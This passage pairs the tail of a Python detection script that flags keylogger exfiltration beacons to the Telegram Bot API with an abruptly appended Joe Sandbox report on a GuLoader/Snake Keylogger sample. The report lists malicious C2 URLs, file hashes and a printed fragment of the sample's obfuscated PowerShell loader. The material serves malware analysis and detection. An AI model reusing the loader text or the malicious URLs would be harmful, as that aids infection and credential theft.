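            text = parse_qs(rec["query"]).get("text", [""])[0]
            if any(m in text for m in BEACON_MARKERS):
                return "beacon"
        return "telegram"
    return None


def victim_name(rec):
    """Pull the 'PC Name:' value out of the beacon text, as the report's URL shows it."""
    text = parse_qs(rec["query"]).get("text", [""])[0]
    m = re.search(r"PC Name:\s*(\S+)", text)
    return m.group(1) if m else None


def triage(log_text):
    per_client = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        kind = classify(rec)
        if kind:
            per_client[rec["client"]].append((rec, kind))
    alerts = []
    for client, recs in per_client.items():
        lookups = [r for r, k in recs if k == "fingerprint"]
        beacons = [r for r, k in recs if k == "beacon"]
        for rec in beacons:
            # Beacon preceded by the IP/geo lookups within the window: the full run.
            chained = any(timedelta(0) <= rec["ts"] - lk["ts"] <= WINDOW for lk in lookups)
            alerts.append({"client": client, "pc_name": victim_name(rec),
                           "severity": "high" if chained else "medium"})
        if lookups and not beacons:
            # Lookups alone are weak evidence (many legitimate tools do this), so low priority.
            alerts.append({"client": client, "pc_name": None, "severity": "low"})
    return alerts


if __name__ == "__main__":
    for alert in triage(LOG):
        print(alert)
```

Matching on the beacon text rather than on api.telegram.org alone is what keeps this usable: Telegram Bot API traffic is common on corporate networks (monitoring bots, chat integrations), and the getUpdates client in the constructed log is deliberately left unflagged. Where TLS inspection is not in place the path and query are not visible, and only the host-level sequence (checkip, then geoip, then api.telegram.org from the same client within seconds) remains as a signal.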
                                                                                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                                                                                    Analysis ID:1631823
                                                                                                                                    Start date and time:2025-03-07 16:18:59 +01:00
                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                    Overall analysis duration:0h 7m 2s
                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                    Report type:full
                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                    Number of analysed new started processes analysed:14
                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                    Technologies:
                                                                                                                                    • HCA enabled
                                                                                                                                    • EGA enabled
                                                                                                                                    • AMSI enabled
                                                                                                                                    Analysis Mode:default
                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                    Sample name:uPDwUy9ewY.exe
                                                                                                                                    renamed because original name is a hash value
                                                                                                                                    Original Sample Name:567c3776afcd2c7dfb3b07e4c6dd281c0dcdc770ed2827c9a84cccaf3fe97d6c.exe
                                                                                                                                    Detection:MAL
                                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@7/19@5/6
                                                                                                                                    EGA Information:
                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                    HCA Information:
                                                                                                                                    • Successful, ratio: 97%
                                                                                                                                    • Number of executed functions: 152
                                                                                                                                    • Number of non-executed functions: 63
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 23.60.203.209
• Excluded domains from analysis (whitelisted): fs.microsoft.com, e16604.f.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, c.pki.goog
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
10:19:58 | API Interceptor | 39x Sleep call for process: powershell.exe modified
10:20:28 | API Interceptor | 2x Sleep call for process: svchost.exe modified
10:20:54 | API Interceptor | 14431x Sleep call for process: msiexec.exe modified
IPs (matched against previous analyses)
Match | Associated Sample Name / URL | Detection | Threat Name | Context

Match: 149.154.167.220
  OeM750ajqm.exe | malicious | GuLoader, Snake Keylogger
  UFOiZapHGS.exe | malicious | Snake Keylogger, VIP Keylogger
  x8ggp1u7V8.exe | malicious | AgentTesla
  mKRflLn5sx.exe | malicious | Snake Keylogger, VIP Keylogger
  UOEAjWmusE.exe | malicious | MSIL Logger, MassLogger RAT
  nGI2U2r41E.exe | malicious | Snake Keylogger, VIP Keylogger
  ckHregxJIq.exe | malicious | Snake Keylogger, VIP Keylogger
  PvAmrCZENy.exe | malicious | Snake Keylogger, VIP Keylogger
  8JVG9KELay.exe | malicious | Snake Keylogger, VIP Keylogger
  HBL NO C-ACC-250002.exe | malicious | Snake Keylogger

Match: 104.21.80.1
  DHL AWB Receipt_pdf.bat.exe | malicious | FormBook | www.rbopisalive.cyou/2dxw/
  Marzec 2025-faktura.pdf.exe | malicious | FormBook | www.oldpay.online/u023/?lneDc=2js00DxFGjY6gHlVOW1q9a10L3HzPIs7WpRmaT2A/LnakQk0VzYAjcxSKMUcEwKHsPPKaiHoQA==&NvExnX=FrapFFYPB
  z1companyProfileandproducts.exe | malicious | FormBook | www.dd87558.vip/uoki/
  http://7a.ithuupvudv.ru | malicious | Unknown | 7a.ithuupvudv.ru/favicon.ico
  PRI_VTK250419A.exe | malicious | Lokibot | touxzw.ir/scc1/five/fre.php
  dfiCWCanbj.exe | malicious | Lokibot | touxzw.ir/sccc/five/fre.php
  laser (2).ps1 | malicious | FormBook | www.lucynoel6465.shop/jgkl/
  laser.ps1 | malicious | FormBook | www.tumbetgirislinki.fit/k566/
  QUOTATION REQUEST.exe | malicious | FormBook | www.shlomi.app/t3l4/
  Quotation.exe | malicious | FormBook | www.askvtwv8.top/uztg/

Match: 132.226.247.73
  qUG1ZROxLJ.exe | malicious | MSIL Logger, MassLogger RAT | checkip.dyndns.org/
  HT4YGXBRtx.exe | malicious | Snake Keylogger | checkip.dyndns.org/
  4LJHFzA8jr.exe | malicious | Snake Keylogger | checkip.dyndns.org/
  nGI2U2r41E.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
  7l3CafRVv7.exe | malicious | MSIL Logger, MassLogger RAT | checkip.dyndns.org/
  C6FGS0I3yn.exe | malicious | Snake Keylogger | checkip.dyndns.org/
  ckHregxJIq.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
  jcHIuFAWdB.exe | malicious | MSIL Logger, MassLogger RAT | checkip.dyndns.org/
  SecuriteInfo.com.Win32.CrypterX-gen.30422.25408.exe | malicious | MSIL Logger, MassLogger RAT | checkip.dyndns.org/
  z1INVOICE4602-FMT25020147.scr.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
Domains (matched against previous analyses)
Match | Associated Sample Name / URL | Detection | Threat Name | Context

Match: checkip.dyndns.com
  qUG1ZROxLJ.exe | malicious | MSIL Logger, MassLogger RAT | 132.226.247.73
  OeM750ajqm.exe | malicious | GuLoader, Snake Keylogger | 193.122.6.168
  UFOiZapHGS.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.8.169
  jVE64QGXtK.exe | malicious | MSIL Logger, MassLogger RAT | 193.122.6.168
  TR3lYZyOE3.exe | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
  mKRflLn5sx.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
  HT4YGXBRtx.exe | malicious | Snake Keylogger | 132.226.247.73
  UOEAjWmusE.exe | malicious | MSIL Logger, MassLogger RAT | 193.122.130.0
  4LJHFzA8jr.exe | malicious | Snake Keylogger | 132.226.247.73
  nGI2U2r41E.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73

Match: reallyfreegeoip.org
  qUG1ZROxLJ.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.80.1
  OeM750ajqm.exe | malicious | GuLoader, Snake Keylogger | 104.21.80.1
  UFOiZapHGS.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.64.1
  jVE64QGXtK.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.16.1
  mKRflLn5sx.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.64.1
  HT4YGXBRtx.exe | malicious | Snake Keylogger | 104.21.64.1
  UOEAjWmusE.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.16.1
  4LJHFzA8jr.exe | malicious | Snake Keylogger | 104.21.16.1
  nGI2U2r41E.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.64.1
  7l3CafRVv7.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.80.1

Match: api.telegram.org
  OeM750ajqm.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
  UFOiZapHGS.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
  x8ggp1u7V8.exe | malicious | AgentTesla | 149.154.167.220
  mKRflLn5sx.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
  UOEAjWmusE.exe | malicious | MSIL Logger, MassLogger RAT | 149.154.167.220
  nGI2U2r41E.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
  ckHregxJIq.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
  PvAmrCZENy.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
  8JVG9KELay.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
  HBL NO C-ACC-250002.exe | malicious | Snake Keylogger | 149.154.167.220
ASNs (matched against previous analyses)
Match | Associated Sample Name / URL | Detection | Threat Name | Context

Match: TELEGRAMRU
  OeM750ajqm.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
  UFOiZapHGS.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
  x8ggp1u7V8.exe | malicious | AgentTesla | 149.154.167.220
  mKRflLn5sx.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
  UOEAjWmusE.exe | malicious | MSIL Logger, MassLogger RAT | 149.154.167.220
  nGI2U2r41E.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
  ckHregxJIq.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
  PvAmrCZENy.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
  8JVG9KELay.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
  https://graph.org/WBACK-03-06?qb3n | malicious | Unknown | 149.154.167.99

Match: CLOUDFLARENETUS
  lightijak2.1.exe | malicious | FormBook | 104.21.45.166
  qUG1ZROxLJ.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.80.1
  OeM750ajqm.exe | malicious | GuLoader, Snake Keylogger | 104.21.80.1
  Checkpoint_News.html | malicious | Unknown | 1.1.1.1
  EYv5BQ5NjI.exe | malicious | Unknown | 162.159.133.233
  UFOiZapHGS.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.64.1
  jVE64QGXtK.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.16.1
  x8ggp1u7V8.exe | malicious | AgentTesla | 104.26.13.205
  EYv5BQ5NjI.exe | malicious | Unknown | 162.159.129.233
  CP07E1clp1.exe | malicious | FormBook | 104.21.112.1

Match: UTMEMUS
  qUG1ZROxLJ.exe | malicious | MSIL Logger, MassLogger RAT | 132.226.247.73
  UFOiZapHGS.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.8.169
  HT4YGXBRtx.exe | malicious | Snake Keylogger | 132.226.247.73
  4LJHFzA8jr.exe | malicious | Snake Keylogger | 132.226.247.73
                                                                                                                                                        nGI2U2r41E.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 132.226.247.73
                                                                                                                                                        7l3CafRVv7.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 132.226.247.73
                                                                                                                                                        C6FGS0I3yn.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                        • 132.226.247.73
                                                                                                                                                        ckHregxJIq.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 132.226.247.73
                                                                                                                                                        PvAmrCZENy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 132.226.8.169
                                                                                                                                                        jcHIuFAWdB.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                                        • 132.226.247.73
Associated Sample Name / URL | Detection | Threat Name | Context (rows grouped by Match)
Match: 54328bd36c14bd82ddaa0c04b25ed9ad
qUG1ZROxLJ.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.80.1
OeM750ajqm.exe | malicious | GuLoader, Snake Keylogger | 104.21.80.1
UFOiZapHGS.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.80.1
jVE64QGXtK.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.80.1
mKRflLn5sx.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.80.1
HT4YGXBRtx.exe | malicious | Snake Keylogger | 104.21.80.1
UOEAjWmusE.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.80.1
4LJHFzA8jr.exe | malicious | Snake Keylogger | 104.21.80.1
nGI2U2r41E.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.80.1
7l3CafRVv7.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.80.1
Match: 3b5074b1b5d032e5620f69f9f700ff0e
OeM750ajqm.exe | malicious | GuLoader, Snake Keylogger | 149.154.167.220
EYv5BQ5NjI.exe | malicious | Unknown | 149.154.167.220
UFOiZapHGS.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
x8ggp1u7V8.exe | malicious | AgentTesla | 149.154.167.220
XTN1VzRJZm.exe | malicious | Unknown | 149.154.167.220
EYv5BQ5NjI.exe | malicious | Unknown | 149.154.167.220
XTN1VzRJZm.exe | malicious | Unknown | 149.154.167.220
wubZB5Ar1r.exe | malicious | AgentTesla, PureLog Stealer | 149.154.167.220
yKRHzdeELv.exe | malicious | AgentTesla | 149.154.167.220
mKRflLn5sx.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
Match: 37f463bf4616ecd445d4a1937da06e19
OeM750ajqm.exe | malicious | GuLoader, Snake Keylogger | 142.250.184.238, 172.217.16.193
15Er6ACahF.exe | malicious | GuLoader | 142.250.184.238, 172.217.16.193
uxeS0sMmqM.exe | malicious | GuLoader | 142.250.184.238, 172.217.16.193
uxeS0sMmqM.exe | malicious | GuLoader | 142.250.184.238, 172.217.16.193
JMgOcFOEZC.exe | malicious | GuLoader | 142.250.184.238, 172.217.16.193
https://rea.grupolalegion.ec/p.php/1 | malicious | CAPTCHA Scam ClickFix, LummaC Stealer | 142.250.184.238, 172.217.16.193
https://rea.grupolalegion.ec/p.php/1 | malicious | CAPTCHA Scam ClickFix, LummaC Stealer | 142.250.184.238, 172.217.16.193
SUPPLY ORDERS 934784.exe | malicious | FormBook | 142.250.184.238, 172.217.16.193
NEW PO.exe | malicious | GuLoader | 142.250.184.238, 172.217.16.193
MouseSpeedSetup64.exe | malicious | Unknown | 142.250.184.238, 172.217.16.193
Associated Sample Name / URL | Detection | Threat Name (rows grouped by Match)
Match: C:\Users\user\AppData\Local\Temp\nsd51C8.tmp\nsExec.dll
Palledes.exe | malicious | GuLoader, Snake Keylogger
Balance Pendiente.exe | malicious | GuLoader, Snake Keylogger
Balance Pendiente.exe | malicious | GuLoader, Snake Keylogger
Invoice Pending Payment.exe | malicious | GuLoader, Snake Keylogger
PRUEBA 2.exe | malicious | GuLoader, Snake Keylogger
KWbWCYe6LB.exe | malicious | GuLoader
DOCU800147001.exe | malicious | GuLoader
#U8fdd#U89c4#U540d#U5355.exe | malicious | Unknown
hnTW5HdWvY.exe | malicious | AgentTesla, GuLoader

Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 0.8022071345173829
Encrypted: false
SSDEEP: 1536:RJszRK0I9i0k0I9wXq0I9UGJC/PQJCmJCovVsnQ9Sii1GY9zOoRXTpMNYpKhvUAp:RJE+Lfki1GjHwU/+vVhWqp0
MD5: 2146989B77D73E05C835411EBFA4FE5F
SHA1: BC386998B61637DFC5CADDE828CEA714631950DC
SHA-256: FC6748B4DCAE295CAFB4E9694FAD59D342FB45148C92021F63106499FC2CB103
SHA-512: CAF35E67D0A88461A1171359B6C49DFCC557C575E5E71A37F1AD8B47C58F291BEDF47AA37186A24DA42DDD7463614D49A0FB330BC7B1FC588792FF65048C4ECD
Malicious: false
Reputation: low

Process: C:\Windows\System32\svchost.exe
File Type: Extensible storage engine DataBase, version 0x620, checksum 0x2747cbe0, page size 16384, DirtyShutdown, Windows version 10.0
Category: dropped
Size (bytes): 1048576
Entropy (8bit): 0.9433245826431736
Encrypted: false
SSDEEP: 1536:bSB2ESB2SSjlK/ZvxPXK0I9XGJCTgzZYkr3g16zV2UPkLk+kY+lKuy9ny5zPOZ15:bazaHvxXy2V2UR
MD5: C0E5595441278AB36DFAD0A1E1A3598A
SHA1: CA97B40860CFA70179E3F8946EA8182994931146
SHA-256: 9F5939579A3C84C1351A2C4ABE0D0CF6C61C0EAF084D7938D272FCFE2874C5F9
SHA-512: 2FE0FF94C1F0EB60D5C857603FD5D8ECCC9D9D17B2DBCF050D1E66DF67C8018E20E840B6550EFAD98240849DF6CC261874A9BC4D5ACA7595E5A059F5B422B978
Malicious: false
Reputation: low

Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 16384
Entropy (8bit): 0.08133975055093884
Encrypted: false
SSDEEP: 3:ZjN6YeODEwvll/nqlFcl1ZUllllmYxtillGBnX/l/Tj/k7/t:T6zoEall/qlFclQ/lbtG254
MD5: 74C6F40ED43B8A6D8CCDAE3A061D43FE
SHA1: F3A4C2795C1A73AB82966687B97B6553BD62D646
SHA-256: 83505FF037EC7590427B12FC8B6F888C088C5DC3523607C5CBF623AEAEB3A3E0
SHA-512: AD4631B1640B1D966949915CBA68A715FE925E819AB8510C68D3CE744DAB5E3AD6EDB65B78A059616FA9A1B0B63404BDF9286F73B39467BB2C5BAC0842E15EC1
Malicious: false
Reputation: low

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 53158
Entropy (8bit): 5.062687652912555
Encrypted: false
SSDEEP: 1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
MD5: 5D430F1344CE89737902AEC47C61C930
SHA1: 0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
SHA-256: 395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
SHA-512: DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                                          Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                          Process:C:\Users\user\Desktop\uPDwUy9ewY.exe
                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):6656
                                                                                                                                                                          Entropy (8bit):5.028908901377071
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:96:W7GUaYNwCLuGFctpiKFlYJ8hH4RVHpwdEeY3kRlDr6dMqqyVgN738:Iygp3FcHi0xhYMR8dMqJVgN
                                                                                                                                                                          MD5:51E63A9C5D6D230EF1C421B2ECCD45DC
                                                                                                                                                                          SHA1:C499CDAD5C613D71ED3F7E93360F1BBC5748C45D
                                                                                                                                                                          SHA-256:CD8496A3802378391EC425DEC424A14F5D30E242F192EC4EB022D767F9A2480F
                                                                                                                                                                          SHA-512:C23D713C3C834B3397C2A199490AED28F28D21F5781205C24DF5E1E32365985C8A55BE58F06979DF09222740FFA51F4DA764EBC3D912CD0C9D56AB6A33CAB522
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                          • Antivirus: Virustotal, Detection: 0%
                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                          • Filename: Palledes.exe, Detection: malicious
                                                                                                                                                                          • Filename: Balance Pendiente.exe, Detection: malicious
                                                                                                                                                                          • Filename: Balance Pendiente.exe, Detection: malicious
                                                                                                                                                                          • Filename: Invoice Pending Payment.exe, Detection: malicious
                                                                                                                                                                          • Filename: PRUEBA 2.exe, Detection: malicious
                                                                                                                                                                          • Filename: KWbWCYe6LB.exe, Detection: malicious
                                                                                                                                                                          • Filename: DOCU800147001.exe, Detection: malicious
                                                                                                                                                                          • Filename: #U8fdd#U89c4#U540d#U5355.exe, Detection: malicious
                                                                                                                                                                          • Filename: hnTW5HdWvY.exe, Detection: malicious
                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........d..7..7..7..7..7,..7..7..7..7..7..7Rich..7........PE..L....f.R...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text...J........................... ..`.rdata..,.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                          Process:C:\Users\user\Desktop\uPDwUy9ewY.exe
                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (3179), with CRLF, LF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):56321
                                                                                                                                                                          Entropy (8bit):5.332263803827941
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:1536:I7vv5vi05gFc7vwSFdRb4EyBadMcMd4RuVmjwOq:IJi0ZFbnKa2WuVmjwh
                                                                                                                                                                          MD5:730AEA65EF85239C2F02CE5C768B89AB
                                                                                                                                                                          SHA1:3B027D1151893B724F4EABA180835B69CE4DDF0F
                                                                                                                                                                          SHA-256:81422332F98FC6CABE9ED583CC587A255CBF105972F448ADC784D903FEDD052F
                                                                                                                                                                          SHA-512:778F570A96F64F5BA91E2C4D12BC54AE09227A22DAD2EF9ACE6D39E5C4AC64F7A83036AC07941A4D1C2BBEC74DBBEC924E9F74CF8BAA3F314328EEE4C6FCEE2C
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:$drmmendes=$Strikning;........$Genanskaffelsesvrdiers = @'.Scr m.Anaca$IncomVSemiriUnwoonPrewogNaz peCon is PintpEn rei Arbed rundsSta l=Verni$ BrdgMSopraoE tertUd.onoTilkbrOrloveEfterr JaunnSp raeUni,fnTranssBlokbu nprbMisu,mHemipiTidsbsHimmes Medai titto erenPoesi;Doct . Hitlf SideuForpunUn,bjcUddeltMenteifriezo TendnUnpr, SoliW irlamrk,vlTipspeForzirProbl Motor(St,km$Val,tEPaatalDelageS xadc FiretAstror TartoDigynnUndereFrem ua.bortgenerrAfsona estelSeismi Somnt Fejlypanth,H.per$SelsrJGuslairegi tOutwonUdsteeBrochuRegrirRaa,r) Stor .kyn{ olyt.K nce.Neut $StiklUChrysbo tfee eelihRag seHemicf ego.tConi,e On cdU,gpiemedia Trafi(.ringROpride saanbJup trLos neZymoseCh.fmdUndfaiAfsiknAudiegNo rh besta'HypnaIFe telSt,knt.odris radtMikse$ Sp iT.rrana Un xnForlit arbe,KatteEKamme ShmeAThymonDemanhFrem.oLungwllank SMuletl R tib Conge Perin OvereAgar UPhot dSpla.s L,mma FairgEnt mcRheolUpaatedDi lh TemplaClarin SekutUnc v PradhSBr.gecAgnanhUnder.Defe rReanaC Nalor,ekkoaFdevacOverfk Rek
                                                                                                                                                                          Process:C:\Users\user\Desktop\uPDwUy9ewY.exe
                                                                                                                                                                          File Type:Generic INItialization configuration [registrar aabredden]
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):357
                                                                                                                                                                          Entropy (8bit):4.322293998459369
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:6:PLZOEA1KHK56RTYPCl0ic0BTgcNDuARfKQfOwVBbvmF00aLdT4F+6/EB+OHeWhkb:P8HnPel/PMARfKnwVBbvmAhT4F+6TIkb
                                                                                                                                                                          MD5:ACED15FD55D311D663ECC7B5F386B8E2
